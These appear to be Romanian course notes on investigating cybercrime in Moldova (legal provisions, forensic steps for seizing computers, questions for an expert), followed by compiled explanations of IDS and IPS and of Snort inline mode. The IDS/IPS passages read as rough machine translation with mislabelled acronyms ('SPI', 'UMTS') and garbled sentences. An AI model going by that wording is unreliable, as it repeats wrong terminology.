similare; art. 2605 Falsul informatic; art. 2606 Frauda informatică)
- Încălcarea regurilor de securitate la diferite sisteme informatice. Astfel de infracțiuni sunt reglementate de art.261
din Codul penal: Încălcarea regulilor de securitate a sistemului informatic (art. 2611 Accesul neautorizat la reţelele şi
serviciile de telecomunicaţii).
- Pornografia infantilă. Infracțiuni de cest gen sunt prevăzute în art. 208. din Codul penal: Atragerea minorilor la
activitate criminală sau determinarea lor la săvîrşirea unor fapte imorale (art. 2081. Pornografia infantilă).

5. Etapele de investigare a infracțiunilor informatice

Legislația Republicii Moldova a înputernicit mai multe organe speciale cu atribuții de relevare a atentatelor
criminale, de prevenire, curmare, descoperire a infracțiunilor și a persoanelor care le organizează, le comit sau le-au
comis, inclusiv a infracțiunilor informaționale și a fraudelor prin Internet. Astfel:

6
1. Conform art.266 CPP, competența organului de urmărire penală a MAI care efectuează urmărirea penală pentru
orice infracțiune care nu este dată prin lege în competența altor organe de urmărire penală sau este dată în competența
lui prin ordonanța procurorului.
2. Conform art.269 CPP, competența organului de urmărire penală al CCCEC care efectuează urmărirea penală în
privința infracțiunlor prevăzute la art. 236-2611, 324-326, 330-336 din Codul penal.
3. Conform art.273 CPP, sunt abilitate cu funcții de control și alte servicii de stat care participă nemijlocit la verificarea activității
economico-financiare a întreprinderilor, instituțiilor, organizațiilor de stat și a organelor administrației publice locale și centrale.
4. Conform HG RM cu privire la aprobarea Regulamentului Agenției Naționale pentru Reglementare în
Telecomunicații și Informatică, nr.843 din 18.08.2000, toate aceste organe sunt abilitate cu atribuții de depistare a
infracțiunilor, inclusiv a infracțiunilor informaționale și a fraudelor prin Internet, însă doar serviciile operative ale MAI, SIS,
SV și CCCEC, în calitate de organe de constatare, sunt împuternicite atât cu funcții de depistare, cât și cu funcții de verificare
a faptelor prejudecabile, în volumul deplin până la pornirea urmăririi penale, iar organele MAI și ale CCCEC exercită și
urmărirea penală.

5.1. Probatoriul
Probatoriul se realizează după următoarele direcții de bază:
- acumularea de date care confirmă faptul comiterii unor acțiuni ilegale cu utilizarea informației electronice și a
tehnicii de calcul;
- efectuarea acțiunilor de urmărire penală și a altor măsuri de stabilire a legăturii cauzale dintre acțiunile care
constituie metoda de efectuare a unei operații nelgitime și survenirea urmăririlor prin detalierea caracterului acțiunilor
comise de către persoana vinovată;
- stabilirea mărimii pagubei cauzate de acțiunile ilegale;
- acumularea și fixarea faptelor care confirmă implicarea persoanei bănuite sau învinuite de comiterea acțiunilor și
survenirea rezultatelor.
Sosind la locul percheziției sau al examinării, este necesar:
- să se între imediat și inopinat în încăperea unde se află calculatorul, pentru a reduce la minimum posibilitățile de distrugere
a informației care se află în calculator;

RISCURI ȘI RECOMANDĂRI
În unele cazuri, înainte de a intra în încăperea unde urnează a fi efectuată percheziția, aceasta să fie deconectată de la rețeaua
de alimentare cu curent electric.
Personalul să fie trecut în altă încăpere.

RESTRICȚII
De a interzice tuturor persoanelor care lucrează la calculatoare din obiectivul la care se efectuează percheziția,
precum și altor persoane, să se atingă de calculatoarele care funcționează, de mediile de stocare a informațiilor, de tastele
de conectare/deconectare a calculatoarelor.
De a interzice întregului personal să conecteze sau să deconecteze alimentarea cu energie electrică a obiectivului.

În procesul de examinare a sistemului de calcul aflat în stare de funcționare este necesar:


- a se determina în ce program se lucrează în acel moment. Pentru aceasta, se va studia imaginea de pe ecranul
monitorului, care va fi reflectată detaliat în procesul-verbal. În caz de necesitate, se fotografiază sau se înscriu pe video
imaginile privind ecranul monitorului;
- a opri executarea programului, cu reflectarea în procesul-verbal a rezultatelor acţiunilor întreprinse de către
persoana care efectuează examinarea; se vor indica, de asemenea, schimbările care au avut loc pe ecranul monitorului;
- a se stabili prezenţa instalaţiilor exterioare ale calculatorului de acumulare a informaţiei pe discuri magnetice
(HDD/SSD), pe discuri şi instalaţii tip ZZP, prezenţa discului virtual (disc temporar care se formează la pornirea
calculatorului pentru accelerarea funcţionării sale). Toate datele obţinute se vor include în procesul-verbal;
- a se stabili prezenţa instalaţiilor exterioare de acces de la distanţă la sistem şi a se determina starea lor (conectarea
la reţeaua locală, prezenţa modemului), după care calculatorul şi modemul vor fi deconectate de la reţea, reflectînd în
procesul-verbal rezultatele acţiunilor effectuate;
- a se copia programele şi fişierele cu datele create pe discul virtual (dacă acesta există) pe un suport magnetic sau
pe discul de bază staţionar într-un director aparte;
- a deconecta calculatorul şi a continua examinarea calculatorului care nu se află în stare de funcţionare.
În procesul examinării este necesar:
- a indica în procesul-verbal şi în schema anexată la el locul aflării calculatorului şi a instalaţiilor sale periferice
(printerul, modemul, tastatura, monitorul etc.), destinaţia fiecăreia din ele, denumirea, numărul de serie, completarea

7
(prezenţa şi tipul instalaţiilor pentru discuri, cartelă de reţea, grupa de contante etc.), prezenţa conexiunii cu reţeaua
locală de calculatoare sau cu reţelele de telecomunicaţii, starea instalaţiilor (întreagâ sau cu urme de desfacere);
- a descrie exact ordinea de interconectare a instalaţiilor indicate, marcînd (în caz de necesitate) conductoarele de
conexiune şi locurile de conexiune, după care instalaţiile calculatorului vor fi deconectate;
- a se stabili, cu ajutorul unui specialist, prezenţa în interiorul calculatorului a unor piese străine, sustragerea unor
microscheme, deconectarea sursei interne de alimentare cu curent electric (acumulatorului);
- a se împacheta (cu indicarea în procesul-verbal a locului depistării lor) suporturile magnetice, optice etc. Pentru
împachetare se pot utiliza atît casete speciale de păstrare, cît şi pachete de hîrtie sau polietilenă, care exclud nimerirea
prafului, a murdăriei pe suprafaţa de lucru a discului;
- a se împacheta fiecare componentă a calculatorului şi conductoarele de conexiune. Pentru excluderea accesului
altor programe, vor fi sigilate blocul, butonul de conectare a calculatorului şi locul de conectare a conductorului electric,
de asemenea, locurile de unire a părţilor laterale cu panourile din faţă şi din spate ale calculatorului.

5.2. Numirea expertizei


Expertiza este activitatea de cercetare efectuată de către un specialist, denumit expert, avînd ca obiectiv stabilirea
adevărului, a realităţii într-o anumită situaţie sau referitoare la un anumit eveniment.
Fiind un mijloc de constatare, confirmare, dovedire, lămurire a realităţii privind un eveniment, o faptă, o situaţie, pe baza
cunoştinţelor de specialitate, expertiza este un mijloc de probă.
Pentru soluţionare în faţa expertizei tehnico-programiste se pot pune următoarel întrebări:
- Ce fel de informaţii conţin blocurile de sistem şi purtătorii magnetici? Care sînt destinaţia şi posibilităţile lor de
utilizare?
- Ce fel de programe se conţin pe suporturile magnetice de stocare a informaţiei? Care sînt destinaţia şi posibilităţile
lor de utilizare?
- Blocurile de sistem şi suporturile magnetice conţin şi fişiere textuale? Dacă da, atunci care este conţinutul şi
posibilităţile lor de utilizare?
- Pe suporurile magnetice se află informaţie distrusă?
- Este posibilă restabilirea acesteia? Dacă da, atunci care este conţinutul şi posibilităţile sale de utilizare?
- Ce fel de produse de program se conţin pe suporturile magnetice? Care sînt conţinutul, destinaţia şi posibilităţile
lor de utilizare?
- Pe suporturile magnetice se află programe specializate, utilizate pentru selectarea parolei sau a altui procedeu de
pltrundere ilegală într-o reţea de calculatoare? Dacă da, atunci care sînt denumirile lor, particularităţile de acţiune,
posibilităţile de utilizare pentru pătrunderea într-o anumită reţea computerizată?
- Există semne care să confirme utilizarea unui program anume pentru pătrunderea ilegală într-o anumită reţea
computerizată? Dacă da, atunci care este structura cronologică a acţiunilor necesare pentru pornirea unui anumit
program sau pentru executarea unei operaţiuni concrete?
- Lucrînd într-o anumită reţea computerizată, este posibilă efectuarea în produsele program a unor modificări ale
fişierelor de program? Dacă da, atunci în ce mod şi de la ce calculator pot fi făcute schimbările respective?
- E posibil de a obţine acces la o informaţie confidenţială care se află într-o anumită reţea? În ce mod se efectuează
un astfel de acces?
- În ce mod are loc un accesul ilegal într-o reţea computerizată locală?
- Care sînt semnele ce confîrmă o astfel de pătrundere?
- Dacă un acces ilegal a avut loc din afară, atunci care sînt posibilităţile de identificare a calculatorului de la care a
avut loc acest acces?
- Dacă nu existâ semne de pătrundere într-o reţea de calculatoare de la un utilizator extern, atunci cum se poate
constata de la ce calculator este posibilă efectuarea unei operaţiuni asemănătoare?

La soluţionarea expertizei pot fi formulate întrebări privind compatibilitatea unor programe, posibilitatea utilizării
unui anumit program la un anume calculator şi altele în afară de aceasta, se pot pune întrebări privind destinaţia unui
sau altui obiect utilizat în tehnica de calcul
- Care este destinaţia şi posibilităţile de utilizare ale acestui obiect? Ce fel de particularităţi de construcţie are acesta?
- Din ce părţi constă acesta? A fost elaborat în condiţii industriale, casnice sau artizanale?
- Dacă obiectul respectiv a fost confecţionat în condiţii artizanale, atunci din ce domeniu al ştiinţei, tehnicii sau
meşteşugăritului este persoana care a creat acest obiect şi care este nivelul său de professionalism?
- Împreună cu ce obiecte şi aparate ar putea fi utilizat obiectul menţionat?

5.3. Investigații informatice


Investigarea criminalistică a sistemelor informatice prezintă o serie de particularităţi care o diferenţiază în mod
fundamental de alte tipuri de investigaţii. Investigarea criminalistică a sistemelor informatice poate fi definită ca: Utilizarea de
metode ştiinţifice şi certe de asigurare, strîngere, validare, identificare, analiză, interpretare, documentare şi prezentare

8
a probelor de natură digitală obţinute din surse de natură informatică în scopul facilitării descoperirli adevărului în
cadrul procesului penal.
Un posibil model de bune practici în domeniul investigaţiilor criminalistice de natură informatică cuprinde următorii
paşi:
1. Identlficarea incidentului - recunoaşterea unui incident şi determinarea tipului acestuia. Nu reprezintă efectiv o etapă
a investigaţiei criminalistice, dar are un impact semnificativ asupra următoarelor etape.
2. Pregătirea investigaţiei - pregătirea instrumentelor, verificarea procedurilor, obţinerea documentelor ce permit
percheziţia etc.
3. Formularea strategiei de abordare - formularea unei strategii în funcţie de tehnologia implicată şi de posibilele
consecinţe asupra persoanelor şi instituţiilor impiicate. Scopul formulării acestei strategii este să maximizeze potenţialul
obţinerii de probe relevante, minimizînd, în acelaşi timp, impactul negativ asupra victimei.
4. Asigurarea probelor - izolarea, asigurarea şi păstrarea probelor de natură fizică şi digitală. Aceasta include
îndepărtarea celora care ar putea denatura probele în orice fel.
5. Strîngerea probelor - înregistrarea ambianţei fizice şi copierea probelor digitale folosind practici şi proceduri comune
şi acceptate.
6. Examinarea probelor – examinarea în profunzime a probelor, căutarea elementelor care sînt în legătură cu fapta penală
investigată. Acest lucru presupune localizarea şi identificarea probelor, precum şi documentarea fiecărui pas, în scopul
facilitării analizei.
7. Analiza probelor - determinarea semnificaţiei probelorşi relevarea concluziilor cu privire la fapta investigată.
8. Prezentarea probelor - sintetizarea concluziilor şi prezentarea lor într-un mod inteligibil pentru nespecialişti. Această
sinteză trebuie susţinută de o documentaţie tehnică detaliată.
9. Restiîuirea probelor - dacă este cazul, returnarea către proprietarii de drept a obiectelor reţinute în timpul
investigaţiei. Dacă este cazul, determinarea, în funcţie de prevederile legilor procedurale penale, a confiscării obiectelor.

Următoarele crlterii sînt utile în aprecierea oportunităţii privind ridicarea sistemelor informatice:
- Criteriul volumului probelor. Particularitatea sistemelor informatice de a permite stocarea unui volum foarte mare
de informaţie într-un spaţiu de dimensiuni fizice reduse face ca investigaţia să necesite un volum mare de timp
pentru obţinerea probelor relevante. Astfel de cercetări pe o perioadă de timp mare pot fi conduse mult mai eficient
în laborator.
- Criteriul dificultăţilor de natură tehnică.

Procedura ridicării sistemelor informatice poate fi divizată în următoarele etape:


1. Inchiderea sistemului. Dacă sistemul a fost găsit închis în momentul pătrunderii investigatorilor, acesta nu trebuie
sub nici un motiv pornit. Se va proceda în continuare trecînd la celelalte etape. Dacă sistemul a fost găsit deschis, el
trebuie închis, pentru a se putea proceda la ridicarea lui. Pentru închiderea sistemului se pot folosi următoarele procedee:
- deconectarea de la alimentarea cu energie electrică;
- închiderea conform procedurii normale.
2. Etichetarea componentelor. În cazul în care se impune dezasamblarea, fiecare componentă a sistemului trebuie
etichetată înainte de modificarea configuraţiei în vederea ridicării probelor. În cazul cablurilor, se etichetează atît cablul,
cît şi suporturile de unde a fost debranşat. în cazul existenţei unor suporturi care nu au conectate cabluri, este
recomandabil ca să fie etichetate "neocupat". Se poate realiza şi o schiţă a componentelor, cu precizarea simbolurilor
folosite pentru etichetare.
3. Protejarea la modificare. Toate suporturile magnetice de stocare a datelor trebuie protejate împotriva modificării
conţinutului lor. Unele tipuri de hard-diskuri au contacte proprietăți speciale care realizează protejarea la scriere.
4. Ridicarea propriu-zisă. Ridicarea probelor trebuie făcută cu multă grijă, evitîndu-se orice avariere a componentelor.
Este recomandabilă împachetarea componentelor în ambalajul original, dacă acesta poate fi găsit, sau în ambalaj special
ce asigură protecţia electrostatică a acestora. De asemenea, toate suporturile magnetice de stocare a datelor vor fi
ambalate şi sigilate în aşa fei încît accesul la ele să nu fie permis, pînă la desfacerea în laborator.

Copierea trebuie realizată după un procedeu demn de încredere. Pentru a putea avea această caracteristică, copierea
trebuie:
- să asigure posibilitatea verificării de către terţi; instanţa de judecată sau partea adversă, să poată să verifice
acurateţea copiei realizate;
- să aibă ca rezultat copii sigure, ce nu pot fi falsificate.

Bibliografie

1. Maxim Dobrinoiu, Infracțiuni în domeniul informatic, București, 2006.

9
2. Gheorghe Alecu, Alexei Barbăneagră, Regrementarea penală și investigarea criminalistică a infracțiunilor din
domeniul informatic, Ed. Pinguin Book, 2006.
3. Gheorghe Alecu, Particularități ale investigației penale și criminalistice a unor infracțiuni din domeniul informatic,
AP, 8/2, 2005.
4. Ghid introductiv pentru aplicarea dispoziţiilor legale referitoare la criminalitatea informatică, USAID din Romănia,
Bucureşti, 2004.
5. Veaceslav Soltan, Tehnologii informaționale, Cartea XX, Institutul Național al Justiției, Chișinău, 2009.
6. Legea privind prevenirea şi combaterea criminalităţii informatice, nr. 20-XVI din 03.02.09.
7. Hotărârea Guvernului Nr. 811 din 29.10.2015 privind aprobarea Programului național de securitate cibernetică a
Republicii Moldova pentru anii 2016-2020.
8. Hotărârea Guvernului Nr. 201 din 28.03.2017 privind aprobarea Cerinţelor minime obligatorii de securitate
cibernetică.
9. Codul penal al R.M.

10
1. IDS/ISP
Securitate stratificata este cheia pentru protejarea oricarei rețea de orice dimensiune, iar
pentru cele mai multe companii, înseamnă implementarea ambelor sisteme de detectare a
intruziunilor (IDS) și sisteme de prevenire a intruziunilor (IPS). Când vine vorba de IPS și IDS -
ambele sunt necesare pentru protecție maximă împotriva traficului de produse malitioase. De
fapt, furnizori sunt din ce în ce orientati spre combinarea celor două tehnologii într-un singur
pachet.

Un dispozitiv IDS este pasiv, pachetele de date traversează rețeaua printr-un port de
monitorizare, si în cazul în care se detectează ceva suspect IDS semnaleaza alarma. Un IDS
poate detecta mai multe tipuri de trafic malitios, care ar aluneca de un firewall tipic, inclusiv
atacuri de rețea împotriva serviciilor, bazate pe date de atacuri asupra aplicațiilor, atacuri
bazate pe gazdă, cum ar fi datele de conectare neautorizate, si malware cum ar fi viruși, cai
troieni, viermi.. Cele mai multe produse IDS folosesc mai multe metode pentru a detecta
amenințări, de obicei, detectare bazată pe semnături, detectare a anomaliilor desfasurate, și
analiza de protocol dinamică. Motorul IDS înregistrează incidente care sunt înregistrate de
senzorii IDS într-o bază de date și generează alerte pe care le trimite la administratorul de
rețea. Deoarece IDS oferă vizibilitate adânca în activitatea de rețea, acesta poate fi de
asemenea utilizata pentru a ajuta la problemele punctuale cu politica de securitate a
organizației, amenințările existente de documente. Plângerea principal cu IDS este numărul de
alarme false.

Avantajul IPS

Un IPS are toate caracteristicile unui IDS bun, si poate opri traficul in caz de detectare a
codului malitios. Spre deosebire de un IDS, IPS sta in linie cu fluxurile de trafic pe rețea si in caz
de detectare a virusilor se poate opri atacul de reziliere a conexiunii la rețea, prin blocarea
accesului la țintă de la contul de utilizator, adresa IP sau alt atribut asociat cu acel atacator, sau
prin blocarea de orice acces la gazdă țintă, servicii , sau aplicație. În plus, un SPI poate răspunde
la o amenințare detectată în alte două moduri. Se poate reconfigura alte controale de
securitate, cum ar fi un firewall sau router, pentru a bloca un atac. Unele dispozitive IPS pot
aplica patch-uri, chiar dacă gazda are anumite vulnerabilități. În plus, unele IPS pot elimina
conținutul malware, de exemplu ștergerea unui atașament infectat de la un e-mail înainte de a
transmite e-mail a utilizatorului.

De două ori protecție

Deoarece dispozitivele IDS și IPS stau în locuri diferite pe rețea, ele pot - și ar trebui - să fie
utilizate concomitent. Un produs IPS instalat în perimetrul rețelei va ajuta la stoparea atacurilor
Zero Day, cum ar fi viermi și viruși, chiar si cele mai noi amenințări pot fi blocate cu reglare
riguroasă. Un produs IDS instalat în interiorul firewall-ul va monitoriza activitatea internă, paza
împotriva amenințării din interior mereu este prezent, și să dea o mai mare vizibilitate în
evenimentele de securitate, trecute și prezente. Alegerea unui produs care oferă ambele
tehnologii pot fi abordarea cea mai eficientă și eficace.
Diferențierea IDS și IPS
Un IPS nu este la fel ca un IDS. Cu toate acestea, tehnologia pe care o utilizați pentru a
detecta problemele de securitate într-o IDS este foarte similar cu tehnologia pe care o utilizați
pentru a preveni problemele de securitate într-o IPS.

Este important să începem cu înțelegerea că IDS și IPS sunt instrumente foarte, foarte
diferite. Chiar dacă acestea au o bază comună, acestea se încadrează în rețeaua în locuri
diferite, au functii diferite, și de a rezolva diferite probleme.

Un IPS este cel mai bine în comparație cu un firewall. Într-un firewall tipic întreprindere,
veți avea un număr de reguli: poate o sută, poate o mie. Cele mai multe dintre aceste reguli
sunt reguli "pass": "permite trafic prin intermediul." Astfel, firewall-ul devine un pachet de pe
sârmă și începe prin normele sale, în căutarea pentru o regulă care spune că "permite acest
pachet prin." Dacă se ajunge la sfârșitul listei și nu există nici o regulă spune "permite acest
pachet prin," atunci exista un "nega" regula final: ". Drop totul altceva" Astfel, în lipsa unui
motiv pentru a trece de trafic firewall scade.

Și IPS este așa, dar pe dos: are reguli, poate sute, poate mii. Cele mai multe dintre aceste
reguli sunt reguli "neagă": "bloca această problemă de securitate cunoscut." Când un pachet
apare la IPS, IPS arata prin lista de regula de sus în jos, în căutarea pentru un motiv să renunțe
la pachet. La sfârșitul listei, deși, este un implicit "trecere" regula: "permit acest pachet prin."
Astfel, în lipsa unui motiv să renunțe trafic, IPS acesta trece prin.

Firewall-uri și IPS sunt dispozitive de control. Ei stau în linie între două rețele și controla
traficul trece prin ele. Acest lucru înseamnă că IPS este în partea politica a casei de securitate.
Se va pune în aplicare sau a pune în aplicare o politică special cu privire la ceea ce traficul nu
este permis prin intermediul.

Afinitatea evident de firewall-uri și IPSes din punct de vedere topologic ne-a dus la lumea
de UTM, în cazul în care un IPS este încorporat în firewall. UMTS să aveți ambele servicii de
securitate (blocarea amenințărilor de securitate, care să permită traficul de bine cunoscut), într-
un singur dispozitiv. Vom vorbi despre cea mai bună în compresie de IPS si firewall, firewall
UTM (Unified Threat Management) mai târziu.

Principalul motiv de a avea un IPS este de a bloca atacurile cunoscute într-o rețea. Atunci
când există o fereastră de timp între când un exploit este anunțată și aveți timp sau
posibilitatea de a patch sistemele, un IPS este un mod excelent de a bloca rapid atacurile
cunoscute, în special cele cu ajutorul unui instrument comun sau bine-cunoscut exploit.

Desigur, IPSes poate oferi alte servicii. Ca furnizori de produse căuta să se diferențieze,
IPSes au devenit instrumente de limitare rata (care este, de asemenea, de ajutor în Denial de
atenuare Service), instrumente de aplicare a politicii, datele scurgeri de instrumente de
protecție, și comportament instrumente de detectare anomalie. În fiecare caz, totuși, funcția
cheie a SPI este o funcție de control.

Cum lucreaza IDS


Dacă un IPS este un instrument de control, atunci un IDS este un instrument vizibilitate.
Sisteme de detectare a intruziunilor sta într-o parte a rețelei, de monitorizare a traficului de la
mai multe puncte diferite, și să ofere vizibilitate în postura de securitate a rețelei. O analogie
bună este de a compara un IDS cu un analizor de protocol. Un analizor de protocol este un
instrument care un inginer de rețea utilizează să se uite adânc în rețea și să vedem ce se
întâmplă, în detaliu, uneori chinuitor. Un IDS este un "analizor de protocol" pentru inginer
securitate. IDS se uită adânc în rețea și vede ce se întâmplă din punct de vedere al securității.

În mâinile unui analist de securitate, IDS devine o fereastră în rețea. Informațiile furnizate
de IDS va contribui la securitatea și echipele de management de rețea descoperi, ca un start:

Încălcări ale politicii de securitate, cum ar fi sistemele sau utilizatorii care execută aplicații
împotriva politicii
Infectii, cum ar fi virusi sau troieni care au control parțial sau complet de sisteme interne,
folosindu-le să se răspândească infecția și ataca alte sisteme
Scurgere de informații, cum ar fi rularea spyware și furnizori de bustean cheie, precum și
scurgerea de informații accidentală de către utilizatori valabile
Erori de configurare, cum ar fi aplicații sau sisteme cu setările de securitate incorecte sau
de performanță, uciderea greșelile rețea, precum firewall-uri greșelilor în setul de reguli nu se
potrivește cu politica
Clientii neautorizate și servere, inclusiv aplicații server de rețea în pericol, cum ar fi DHCP
sau servicii DNS, împreună cu aplicațiile neautorizate, cum ar fi instrumente de scanare în rețea
sau desktop la distanță negarantate.
Această vizibilitate crescută în postura de securitate a rețelei este ceea ce caracterizează
un IDS, și care diferențiază funcția vizibilitatea unui IDS din funcția de control al unui SPI.

Desigur, din moment ce ambele IDS și IPS au cuvântul "intruziune", ca la începutul


acronim lor, ați putea fi întrebați de ce nu am menționat "intruziune", ca parte a funcției fie IDS
și IPS. Parțial că este, deoarece cuvântul "intruziune" este atât de vagă încât e dificil să știi ce o
intruziune, este. Desigur, cineva încearcă în mod activ să pătrundă într-o rețea este un intrus.
Dar este un calculator infectat, o "intruziune?" Este cineva care desfășoară recunoaștere rețea
un intrus ... sau pur și simplu cineva a face cercetare? Și dacă un actor malware este în rețea în
mod legitim - de exemplu, un angajat rogue - sunt legitime și nelegitime acțiuni intruziuni sau
altceva?

Mai important motiv pentru care a plecat "intruziune" din descrierea atât pentru IDS și IPS
este că ele nu sunt foarte bun la prinderea intruși adevărat. Un IPS va bloca atacurile cunoscute
foarte bine, dar cele mai multe dintre aceste atacuri sunt fie recunoaștere rețea sau scanari
automate, căutarea sau alte sisteme pentru a infecta - greu "intruziuni" în sensul clasic al
cuvântului. Cel mai bun sistem de prevenire a intruziunilor, în acest caz, este firewall, care nu
lasa trafic necorespunzătoare în rețea, în primul rând.

Este greșită a cuvântului "intruziune", cu referire la aceste tehnologii vizibilitate și control


care a provocat o astfel de confuzie și așteptările greșite în personalul de la întreprinderile care
au desfășurate fie IDS și IPS.

Da, un IDS va detecta intruziuni adevărat. Da, un IPS va bloca intruziuni adevărat. Dar
aceste produse nu mai mult de atât - ele oferă un control mai mare și o mai mare vizibilitate,
care este în cazul în care valoarea lor reală.

Ce despre IPSes UTM?


Combinația dintre un IPS și un firewall într-un singur sistem, cu un singur sistem de
management, este atractiv. Din păcate, sisteme de management amenințarea cea mai unificate
(UMTS) sunt proiectate pentru SMB implementare, un mediu în care simplitatea sistemului de
management este una dintre cerințele de proiectare cele mai critice. Combinând
managementul IPS cu managementul firewall-ul este o sarcină foarte dificilă. De fapt, nici un
furnizor de produse a reușit să fuzioneze sistemul de management al firewall-ul web-based, cu
un bun instrument de management IPS.
Nu trebuie să presupunem că un IPS încorporate într-un firewall UTM va oferi aceleași
tipuri de controale și de protecție ca IPS stătătoare.
Acest lucru nu înseamnă că nu există firewall UTM mari cu IPSes încorporate, aceasta
înseamnă doar că sistemele de management pentru partea IPS din aceste produse sunt destul
de diferite (și de multe ori separat) din părțile firewall.
În cazul în care vânzătorul dumneavoastră potențial firewall UTM are incluse IPS și
funcționalitatea firewall pe toate într-o interfață omogenă singur web, sunteți în căutarea la un
produs care IPS este obtinerea instrumente de management de mâna a doua. Acest lucru poate
fi bine în medii în care sunteți interesat doar de control, cum ar fi la sucursale sau în cazul în
care doar un mic set de sisteme sunt protejate.
Pentru a gasi un IPS enterprise-class, combinate cu un firewall UTM, uita-te pentru
produsele care sunt, în mod paradoxal, mai puțin integrate: un IPS independente și firewall
independent combinate în același șasiu, de exemplu.
- Joel SNYDER

Cerințe preliminare
Pentru a obține cele mai multe din articol, ar trebui să aveți cunoștințe de bază de Snort,
Linux și un sistem Linux de lucru pe care le puteți practica comenzile cuprinse în acest articol.
De asemenea, ar trebui să aveți unele cunoștințe de rețea, cum ar fi TCP / IP, iptables, etc

Ce este IPS (Intrusion Prevention System)?

Intrusion Detection System (IDS) este un dispozitiv care monitorizeaza pachetele din
rețea. IDS raportează comportamente de atac, bazate pe normele de securitate și semnăturile
aplicate pe dispozitiv. Cu toate acestea IDS are anumite dezavantaje, cum ar fi de mare rata de
rezultate fals pozitive, în imposibilitatea de a opri Denial of Service (DoS) atac și de intruziuni
din protocoalele UDP.

Intrusion Prevention System (IPS), pe de altă parte, are nu numai capacitatea de IDS, dar,
de asemenea, poate scădea pachete malware și sesiuni de strânsă legătură, în scopul de a opri
atacurile viitoare. IPS-ar putea realiza în timp real Interzicerea de pârghie desfășurarea în linie
în topologia rețelei. Acesta analizează tot traficul de rețea care trece prin sistem si ia măsuri
pentru pachete suspecte imediat.

Metoda de implementare de rețea de IDS și IPS

Având în vedere diferențele dintre IDS și IPS, desfășurarea acestor două sisteme este
proiectat în funcție de caracteristicile lor.
IDS, de obicei, joacă rolul de monitorizare. IDS trebuie să fie capabil de a mirosi de trafic
care interesează IDS în timp ce nu compromite transfer rețeaua globală. Următoarea figură
ilustrează modul tipic de implementarea unui dispozitiv IDS la o rețea.

Pe de altă parte, IPS trebuie să ia măsuri imediate pentru pachete suspecte.Implementare


trebuie să activezi IPS sa se uite la fiecare pachet și să se ocupe cu pachete suspecte în timp
real. Face de obicei tot traficul trece printr-IPS ar putea realiza cerința de desfășurare. Aceasta
este așa-numita implementare în linie.

Snort pe Linux pentru a acționa ca un IPS

În general Snort este un software sofisticat IDS, care monitorizează traficul de rețea
pentru a detecta și analiza comportamentul ataca în conformitate cu reguli predefinite. Snort
trimite alerte la administratorul de rețea în timp ce sunt detectate atacuri sau activități de rețea
anormale. Totuși, funcția de sistem este limitat la monitorizarea pasiv petrecere. Acțiunea de
protecție trebuie să se bazeze pe răspunsul administratorului.
Deși Snort este frecvent utilizat ca un IDS, acesta are unele capabilități îmbunătățite ar
putea face într-un SPI. Acest articol ilustrează în special modul în care Snort poate acționa ca un
dispozitiv de IPS.

Prin utilizarea următoarele setări, Snort devine o IPS să ia măsuri imediate pentru Trafic
suspecte.

 Metoda de instalare de rețea

- În-linie de implementare: implementarea inline permite Snort să se uite la fiecare


pachet și să se ocupe cu pachete suspecte direct

 Configurație avansată rețea


- iptables
 Snort modul de configurare
- Modul in-line
 Snort de Acțiuni statului
 picătură / respinge / sdrop

IDS/IPS (Windows, Linux etc.)


Intrusion Detection System (IDS) şi Intrusion Prevention System(IPS o varianta mai
specială a IDS) – un dispozitiv sau o aplicaţie folosit(ă) pentru a inspecta întregul trafic dintr-o
reţea şi de a trimite mesaje de alertă utilizatorului sau administratorului sistemului cu privire la
încercări neautorizate de acces. Principalele metode de monitorizare sunt cele bazate pe
semnături şi cele bazate pe anomalii. Funcţie de metodele folosite IDS-ul poate rămâne la
stadiul de a alerta utilizatori sau poate fi programat să blocheze automat traficul sau chiar
programat să răspundă într-un anumit fel.

Fig. 1.1 IDS la nivel software şi hardware (în patea dreptă se observă avantajele folosirii
sistmelor de tip IPS pentru protecţia unor instituţii speciale cum ar fi baze militare, închisori,
etc.)
Intrusion Detection System (IDS)
Este din ce in ce mai important, pentru personalul ce asigura securitatea retelei sa apere
resursele companiei, nu doar pasiv, prin utilizarea de firewall-uri, retele virtuale private (VPN),
tehnici de criptare sau orice alte “trucuri pe care le au in maneca”, dar si prin implementarea
unor dispozitive ce supravegheaza proactiv reteaua. Aceasta este momentul in care intra in
actiune Intrusion Detection System (IDS) – sistemele de detectare a intruziunii.
In general, intruziune este atunci cand cineva incearca sa patrunda abuziv sau exploateaza
o slabiciune a sistemulului dumneavoastra pentru a avea acces neautorizat la o resursa. Mai
precis, politica de securitate a companiei dumneavoastra defineste ceea ce constituie o
intruziune.
Intrusion Detection System este utilizat pentru a detecta comportamente malitioase care
incearca sa se furisese in retea si sa compromita securitatea unui sistem informatic. Acestea
includ atacurile asupra retelelor ce gazduiesc servicii si aplicatii vulnerabile, atacurile asupra
unui anumit sistem/host, cum ar fi conectari neautorizate si acces la fisiere sensibile, precum si
malware (virusi, cai troieni si viermi). Odata intrat in retea/sistem, virusul poate dormita
saptamani intregi inainte de a-si indeplini misiunea. Pentru a fi eficient IDS-ul trebuie sa-si
actualizeze baza de date cu semnaturi, dar pentru ca cracker-ii sunt intr-o continua cautare,
compania nu este niciodata complet imuna.
Trebuie mentionat ca sunt doua tipuri de intrusi: interni si externi.
Desi majoritatea tentativelor de intruziune, apar din interior organizatiei sau sunt facute
de catre intrusi interni, cele mai frecvente masuri de securitate sunt implementate pentru a
proteja interiorul retelei de lumea exterioara. Intrusii externi sunt deseori denumiti crackers.
Este clara necesitatea unui mecanism care sa poate detecta continuu ambele tipuri de
intruziuni. IDS-urile sunt solutii eficiente pentru ambele tipuri de atacuri. Aceste sisteme ruleaza
permanent in retea, notificand personalul responsabil cu securitatea retelei, atunci cand
detecteaza o tentativa pe care o considera suspecta. IDS-ul are doua componente principale si
anume: senzori IDS si management IDS.
Senzorii IDS pot fi atat software cat si hardware si sunt utilizati pentru a colecta si analiza
traficul din retea. Acesti senzori sunt disponibili in doua variante, pentru retea si pentru
calculator (host).
1. Senzorul IDS pentru host/gazda este o aplicatie agent care ruleaza pe un server cu un
minim de incarcare pentru a monitorizara sistemul de operare.
2. Senzor IDS pentru retea poate fi incorporat intr-un dispozitiv de retea, poate fi
dispozitiv independent sau poate fi un modul de monitorizare a traficului din retea.
Componenta de management IDS, asigura colectarea avertizarilor si realizeaza
configurarea si implementarea serviciilor pe senzori IDS din retea.
In lista de instrumente ce supravegheaza proactiv traficul din retea se regaseste atat NBA
(Network Behavior Analysis – analizeaza comportamentul intr-o retea), cat si IPS (Intrusion-
prevention systems – sistem de prevenire a intruziunii).
